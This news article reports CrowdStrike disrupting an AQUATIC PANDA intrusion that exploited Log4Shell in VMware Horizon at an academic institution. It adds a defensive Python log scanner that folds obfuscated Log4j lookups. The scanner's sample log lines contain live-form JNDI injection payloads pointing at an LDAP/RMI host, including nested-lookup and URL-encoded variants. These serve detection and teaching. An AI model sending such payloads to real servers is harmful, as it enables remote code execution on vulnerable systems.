CrowdStrike witnessed a Chinese espionage group, AQUATIC PANDA, using the Log4j bug (dubbed Log4Shell) to attack an unnamed academic institution.
The CrowdStrike Falcon OverWatch team uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution. The company didn’t name the institution but noted that it was able to disrupt an ‘active hands-on intrusion.’
The CrowdStrike Intelligence team linked the infrastructure used in the attempted hack to the threat actor known as AQUATIC PANDA. According to researchers, it is a China-based targeted intrusion adversary with a dual mission of intelligence collection and industrial espionage.
AQUATIC PANDA relies heavily on Cobalt Strike, and its toolset includes the unique Cobalt Strike downloader tracked as FishMaster. AQUATIC PANDA has also been observed delivering njRAT payloads to targets.
“Throughout the intrusion, OverWatch tracked the threat actor’s activity closely in order to provide continuous updates to the victim organization. Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” the company said.
This is not the first time China-linked threat actors have been found exploiting the vulnerability. For example, Microsoft has observed HAFNIUM, a threat actor group operating out of China, using the vulnerability to attack virtualization infrastructure and extend its typical targeting. HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.
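Defenders triaging an exposed web front end like the Tomcat process under VMware Horizon mentioned above usually start by checking request logs for Log4j lookup strings. The following Python example is added here and is not CrowdStrike's, Microsoft's or CISA's code; it folds the common nested-lookup and URL-encoding obfuscations before matching and runs over a few constructed access-log lines that use documentation-range addresses.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

LOOKUP = re.compile(r"\$\{[^{}]*\}")                          # innermost ${...} only
CASE_FN = re.compile(r"^\$\{(lower|upper):([^}]*)\}$", re.I)  # ${lower:j} -> j
DEFAULT_VAL = re.compile(r"^\$\{(?:[^}]*?):-([^}]*)\}$")      # ${x:-j} / ${::-j} -> j
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)                   # signal after normalization

def _resolve(m):
    """Collapse one innermost lookup to its literal value, or leave it untouched."""
    tok = m.group(0)
    case = CASE_FN.match(tok)
    if case:
        return case.group(2).lower() if case.group(1).lower() == "lower" else case.group(2).upper()
    default = DEFAULT_VAL.match(tok)
    return default.group(1) if default else tok

def normalize(text: str) -> str:
    """URL-decode (two layers) and fold nested Log4j lookups from the inside out."""
    text = unquote(unquote(text))
    for _ in range(20):                     # bounded; stops once nothing folds
        folded = LOOKUP.sub(_resolve, text)
        if folded == text:
            break
        text = folded
    return text

def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """One hit per access-log line that still carries a JNDI lookup after normalization."""
    hits = []
    for n, line in enumerate(lines, 1):
        decoded = normalize(line)
        if JNDI.search(decoded):
            hits.append({"line": n, "client": line.split()[0], "decoded": decoded})
    return hits

# Constructed sample lines (combined log format, documentation-range addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:03:45 +0000] "GET /portal/ HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:04:02 +0000] "GET /portal/?q=${${lower:j}ndi:rmi://198.51.100.9/b} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '203.0.113.9 - - [10/Dec/2021:14:05:30 +0000] "GET /login?u=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F198.51.100.9%2Fc%7D HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Matching only on the literal string `${jndi:` misses the second, third and fourth forms above, which is why the lookups are folded first.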
The Cybersecurity and Infrastructure Security Agency (CISA) recently published an open-sourced log4j-scanner, designed to help organizations identify potentially vulnerable web services affected by the Log4j vulnerabilities.
Meanwhile, Apache has already issued updates fixing five Log4j vulnerabilities.